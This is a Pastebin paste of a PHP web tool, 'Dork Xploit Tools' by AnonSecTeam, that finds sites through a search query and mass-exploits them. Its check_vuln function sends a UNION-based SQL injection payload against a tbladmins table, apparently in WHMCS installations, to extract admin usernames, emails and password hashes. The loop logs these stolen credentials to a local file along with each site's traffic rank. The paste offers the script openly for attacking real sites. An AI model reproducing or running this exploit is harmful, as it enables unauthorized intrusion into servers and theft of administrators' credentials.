Paceusa

Dork Script Exploit

Jul 24th, 2021
1,400
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. /*
  3. *****************************************************
  4.  
  5. *****************************************************
  6. */
  7.  
  8. set_time_limit(0);
  9. ini_set('memory_limit', '64M');
  10. header('Content-Type: text/html; charset=UTF-8');
  11. function letItBy(){ ob_flush(); flush(); }
  12. function getAlexa($url)
  13. {
  14.         $xml = simplexml_load_file('http://data.alexa.com/data?cli=10&dat=snbamz&url='.$url);
  15.         $rank1 = $xml->SD[1];
  16.         if($rank1)
  17.                 $rank = $rank1->POPULARITY->attributes()->TEXT;
  18.         else
  19.                 $rank = 0;
  20.         return $rank;
  21. }
  22.        
  23. function google_that($query, $page=1)
  24. {
  25.         $resultPerPage=8;
  26.         $start = $page*$resultPerPage;
  27.         $url = "https://urlscan.io/api/v1/search/?q=" . urlencode($query);
  28.         $resultFromGoogle = json_decode( http_get($url, true) ,true);
  29.         if(isset($resultFromGoogle['responseStatus'])) {
  30.                 if($resultFromGoogle['responseStatus'] != '200') return false;
  31.                 if(sizeof($resultFromGoogle['responseData']['results']) == 0) return false;
  32.                 else return $resultFromGoogle['responseData']['results'];
  33.         }
  34.         else
  35.                 die('The function <b>' . __FUNCTION__ . '</b> Silakan Salin Link<br>' . $url );
  36. }
  37.        
  38. function http_get($url, $safemode = false){
  39.         if($safemode === true) sleep(1);
  40.         $im = curl_init($url);
  41.         curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
  42.         curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
  43.         curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
  44.         curl_setopt($im, CURLOPT_HEADER, 0);
  45.         return curl_exec($im);
  46.         curl_close();
  47. }
  48.  
  49. function check_vuln($url) {
  50. $url = dirname($url) . '/search';
  51. $url = str_replace("/search","",$url);
  52.  
  53. $post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(0x3a3a3a3a3a,id,0x3a,username,0x3a,email,0x3a,password,0x3a3a3a3a3a) FROM tbladmins),0,0,0,0,0,0,0,0,0,0,0#";
  54. $curl_connection = curl_init($url);
  55. if($curl_connection != false) {
  56.         curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
  57.         curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36");
  58.         curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
  59.         curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
  60.         curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
  61.         curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post);
  62.         $source = curl_exec($curl_connection);
  63.         preg_match_all('/:::::(.*?):::::/s',$source,$infoz);
  64.         if($infoz[0]) {
  65.                 return $infoz[0];
  66.         }
  67.         else
  68.                 return "Fail!";
  69. }
  70. else
  71.         return "Fail!";
  72. }
  73. ?>
  74. <html>
  75. <head>
  76. <title>Dork Xploit Tools</title>
  77. </head>
  78. <STYLE>
  79. textarea{background-color:#105700;color:lime;font-weight:bold;font-size: 20px;font-family: Tahoma; border: 1px solid #000000;}
  80. input{FONT-WEIGHT:normal;background-color: #105700;font-size: 15px;font-weight:bold;color: lime; font-family: Tahoma; border: 1px solid #666666;height:20}
  81. body {
  82. font-family: Tahoma
  83. }
  84. tr {
  85. BORDER: dashed 1px #333;
  86. color: #FFF;
  87. }
  88. td {
  89. BORDER: dashed 1px #333;
  90. color: #FFF;
  91. }
  92. .table1 {
  93. BORDER: 0px Black;
  94. BACKGROUND-COLOR: Black;
  95. color: #FFF;
  96. }
  97. .td1 {
  98. BORDER: 0px;
  99. BORDER-COLOR: #333333;
  100. font: 7pt Verdana;
  101. color: Green;
  102. }
  103. .tr1 {
  104. BORDER: 0px;
  105. BORDER-COLOR: #333333;
  106. color: #FFF;
  107. }
  108. table {
  109. BORDER: dashed 1px #333;
  110. BORDER-COLOR: #333333;
  111. BACKGROUND-COLOR: Black;
  112. color: #FFF;
  113. }
  114. input {
  115. border                  : dashed 1px;
  116. border-color            : #333;
  117. BACKGROUND-COLOR: Black;
  118. font: 8pt Verdana;
  119. color: Red;
  120. }
  121. select {
  122. BORDER-RIGHT:  Black 1px solid;
  123. BORDER-TOP:    #DF0000 1px solid;
  124. BORDER-LEFT:   #DF0000 1px solid;
  125. BORDER-BOTTOM: Black 1px solid;
  126. BORDER-color: #FFF;
  127. BACKGROUND-COLOR: Black;
  128. font: 8pt Verdana;
  129. color: Red;
  130. }
  131. submit {
  132. BORDER:  buttonhighlight 2px outset;
  133. BACKGROUND-COLOR: Black;
  134. width: 30%;
  135. color: #FFF;
  136. }
  137. textarea {
  138. border                  : dashed 1px #333;
  139. BACKGROUND-COLOR: Black;
  140. font: Fixedsys bold;
  141. color: #999;
  142. }
  143. BODY {
  144.         SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
  145. margin: 1px;
  146. color: Red;
  147. background-color: Black;
  148. }
  149. .main {
  150. margin                  : -287px 0px 0px -490px;
  151. BORDER: dashed 1px #333;
  152. BORDER-COLOR: #333333;
  153. }
  154. .tt {
  155. background-color: Black;
  156. }
  157.  
  158. A:link {
  159.         COLOR: White; TEXT-DECORATION: none
  160. }
  161. A:visited {
  162.         COLOR: White; TEXT-DECORATION: none
  163. }
  164. A:hover {
  165.         color: Red; TEXT-DECORATION: none
  166. }
  167. A:active {
  168.         color: Red; TEXT-DECORATION: none
  169. }
  170.  
  171. #result{margin:10px;}
  172. #result span{display:block;}
  173. #result .Y{background-color:green;}
  174. #result .X{background-color:red;}
  175. </STYLE>
  176. <script language=\'javascript\'>
  177. function hide_div(id)
  178. {
  179.   document.getElementById(id).style.display = \'none\';
  180.   document.cookie=id+\'=0;\';
  181. }
  182. function show_div(id)
  183. {
  184.   document.getElementById(id).style.display = \'block\';
  185.   document.cookie=id+\'=1;\';
  186. }
  187. function change_divst(id)
  188. {
  189.   if (document.getElementById(id).style.display == \'none\')
  190.     show_div(id);
  191.   else
  192.     hide_div(id);
  193. }
  194. </script>
  195. </td></table></tr>
  196. <br>
  197. <br>
  198. <link rel="stylesheet" type="text/css" href="http://fonts.googleapis.com/css?family=Audiowide">
  199.     <style>
  200.       body {
  201.         font-family: 'Audiowide', serif;
  202.         font-size: 30px;
  203.                
  204.       }
  205.     </style>
  206.   </head>
  207.  
  208.   <body onLoad="type_text()" ; bgColor=#f7ff0a text=#14dcff background="Fashion fuchsia">
  209.     <center>
  210. <font face="Audiowide" color="red">Dork Xploit Tools <font color="white"> AnonSecTeam</font>
  211. <br>
  212. <font color="white" size="4"> [For Heker To Haxor ver. <= </font><font color="white" size="4">1.0</font><font color="white" size="4">]</font>
  213. </font>
  214. <br><br>
  215.  
  216. <table border=1 bordercolor=white>
  217. <tr>
  218. <td width="700">
  219. <br />
  220. <center>
  221.         <form method="post">
  222.                 Google Dork: &nbsp;&nbsp;
  223.                 <input type="text" id="dork" size="30" name="dork" value="<?php echo (isset($_POST['dork']{0})) ? htmlentities($_POST['dork']) : 'Masukan Dork Lu Disini'; ?>" />
  224.                 &nbsp;&nbsp;<input type="submit" value="Xploit!" id="button"/>
  225.         </form>
  226. <?php
  227.         if(isset($_POST['dork']{0})) {
  228.                 $file = fopen("WMCS-Hashes.txt","a");
  229.                 echo '<br /><div id="result"><b>Scanning has been started... Good luck! ;)</b><br><br>';                      
  230.                 letItBy();                    
  231.                 for($googlePage = 1; $googlePage <= 50; $googlePage++) {
  232.                         $googleResult = google_that($_POST['dork'], $googlePage);
  233.                         if(!$googleResult) {
  234.                                 echo 'Finished scanning.';
  235.                                 fclose($file);
  236.                                 break;
  237.                         }
  238.                        
  239.                         for($victim = 0; $victim < sizeof($googleResult); $victim++){
  240.                                 $result = check_vuln($googleResult[$victim]['unescapedUrl']);
  241.                                 $alexa = getAlexa($googleResult[$victim]['unescapedUrl']);
  242.                                 if($result != "Fail!") {
  243.                                         $hashes = "";
  244.                                         foreach ($result as $record) {
  245.                                                 $hashes = $hashes . str_replace(':::::','',$record) . "\n";
  246.                                         }
  247.                                         $sep = "========================================================\n";
  248.                                         $data = $sep . $googleResult[$victim]['unescapedUrl'] . " - Alexa: " .$alexa. "\n" . $sep . $hashes . "\n";
  249.                                         fwrite($file,$data);
  250.                                         echo "<br /><font color=\"red\">Successfully Xploit...</font>";
  251.                                         echo '<span class="Y">';
  252.                                         echo "<pre>" . $data . "</pre></span><br />";
  253.                                        
  254.                                 }
  255.                                 else {
  256.                                 echo '<span class="X">';
  257.                                 echo "<a href=\"{$googleResult[$victim]['unescapedUrl']}\" target='_blank'>{$googleResult[$victim]['titleNoFormatting']}</a> - <font color=\"white\">Failed!</font>";
  258.                                 echo "</span>\n<br />";
  259.                                 }
  260.                                 letItBy();
  261.                         }
  262.                 }
  263.                 echo '</div>';
  264.         }
  265. ?>
  266. </center>
  267. </td>
  268. </table>
  269. <br /><br />
  270. <font face="Audiowide" color="red" size="2">
  271. Coded by: <font color="white">AnonSecTeam</font> <font color="white">|</font> Telegram: <font color="white"><a href="t.me/anonsecteam">AnonSecTeam</a></font><br /><br />
  272. <br > <font color="green">For more tools/scripts/exploits/etc.</font>
  273. <br />visit <a href="http://anonsec-team.org" target="_blank" style="text-decoration: none;">AnonSecTeam.org</a>
  274. </font>
  275.  
  276. </center>
  277. </body>
  278. </html>
RAW Paste Data